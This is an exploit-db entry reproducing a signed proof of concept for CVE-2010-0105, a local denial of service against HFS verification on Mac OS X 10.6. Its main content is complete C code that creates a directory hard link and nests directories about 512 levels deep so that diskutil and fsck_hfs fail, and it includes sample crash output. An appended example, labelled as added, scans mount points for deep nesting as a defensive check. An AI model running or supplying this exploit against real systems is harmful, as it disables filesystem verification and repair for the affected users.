
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)

24 Apr 2010 | Reported by Maksymilian Arciemowicz | Type: exploitdb | Source: www.exploit-db.com

Apple Mac OSX 10.6 HFS FileSystem DoS attac

Code
// -----BEGIN PGP SIGNED MESSAGE-----
// Hash: SHA1
/* 	Proof of Concept for CVE-2010-0105
	MacOS X 10.6 hfs file system attack (Denial of Service)
	by Maksymilian Arciemowicz from SecurityReason.com

	http://securityreason.com/achievement_exploitalert/15
	
	NOTE:
	
	This DoS will be localized in phase
	
	Checking multi-linked directories

	So we need activate it with line
	
		connlink("C/C","CX");

	Now we need create PATH_MAX/2 directory tree to make overflow.

	and we should get diskutil and fsck_hfs exit with sig=8
	
	~ x$ diskutil verifyVolume /Volumes/max2
	Started filesystem verification on disk0s3 max2
	Performing live verification
	Checking Journaled HFS Plus volume
	Checking extents overflow file
	Checking catalog file
	Checking multi-linked files
	Checking catalog hierarchy
	Checking extended attributes file
	Checking multi-linked directories
	Maximum nesting of folders and directory hard links reached
	The volume max2 could not be verified completely
	Error: -9957: Filesystem verify or repair failed
	Underlying error: 8: POSIX reports: Exec format error
	
		
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>


int createdir(char *name){
	if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR |S_IXUSR)){
		printf("Can`t create %s", name);
		exit(1);}
		else
		return 0;	
}

int comein(char *name){
	if(0!=chdir(name)){
		printf("Can`t chdir in to %s", name);
		exit(1);}
		else
		return 0;	
}

int connlink(a,b)
char *a,*b;
{
	if(0!=link(a,b)){
		printf("Can`t create link %s => %s",a,b);
		exit(1);}
		else
		return 0;	
}

int main(int argc,char *argv[]){
	
 	int level;
	FILE *fp;
	
	if(argc==2) {
		level=atoi(argv[1]);
	}else{
		level=512; //default
	}
	createdir("C"); //create hardlink
	createdir("C/C"); //create hardlink
	
	connlink("C/C","CX"); //we need use to checking multi-linked directorie

	comein("C");
	
	while(level--)
			printf("Level: %i mkdir:%i chdir:%i\n",level,
			createdir("C"),
			comein("C"));		
	
	
	printf("check diskutil verifyVolume /\n");
	return 0;
}
/*
- -- 
Best Regards,
- ------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<[email protected]>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
=IML/
-----END PGP SIGNATURE-----
*/
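
For triage on the defensive side, the following added example (not part of the original advisory or PoC) measures directory nesting depth under a mount point, so unusually deep chains like the one the note above describes can be found before a verification run. The names `walk` and `scan_nesting` and the default limit of 100 are choices made here; the scan reports nesting depth only and does not identify directory hard links.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Descend from an open directory fd with *at() calls only: no full path is
   built, so PATH_MAX is never hit. Stopping at `limit` bounds fds and stack. */
static int walk(int dfd, int level, int limit, int *hits)
{
    int deepest = level;
    struct dirent *e;
    DIR *d = fdopendir(dfd);              /* takes ownership of dfd */
    if (!d) { close(dfd); return level; }
    while ((e = readdir(d)) != NULL) {
        struct stat st;
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, ".."))
            continue;
        if (fstatat(dirfd(d), e->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0 ||
            !S_ISDIR(st.st_mode))
            continue;                     /* skip files and symlinks */
        if (level + 1 >= limit) {         /* chain reaches limit: count it, */
            (*hits)++;                    /* do not descend further         */
            deepest = limit;
            continue;
        }
        int cfd = openat(dirfd(d), e->d_name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        if (cfd < 0) continue;
        int sub = walk(cfd, level + 1, limit, hits);
        if (sub > deepest) deepest = sub;
    }
    closedir(d);
    return deepest;
}
/* Hypothetical entry point. Root is level 0; returns deepest level, -1 on error. */
int scan_nesting(const char *root, int limit, int *hits)
{
    int fd = open(root, O_RDONLY | O_DIRECTORY);
    *hits = 0;
    return fd < 0 ? -1 : walk(fd, 0, limit, hits);
}
int main(int argc, char **argv)
{
    int hits, deepest = scan_nesting(argc > 1 ? argv[1] : ".", 100, &hits);
    printf("deepest=%d chains_at_limit=%d\n", deepest, hits);  /* 100: assumed */
    return hits > 0;
}
```

The exit status is non-zero when at least one chain reaches the limit, which makes the scan usable as a pre-check in a maintenance script.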
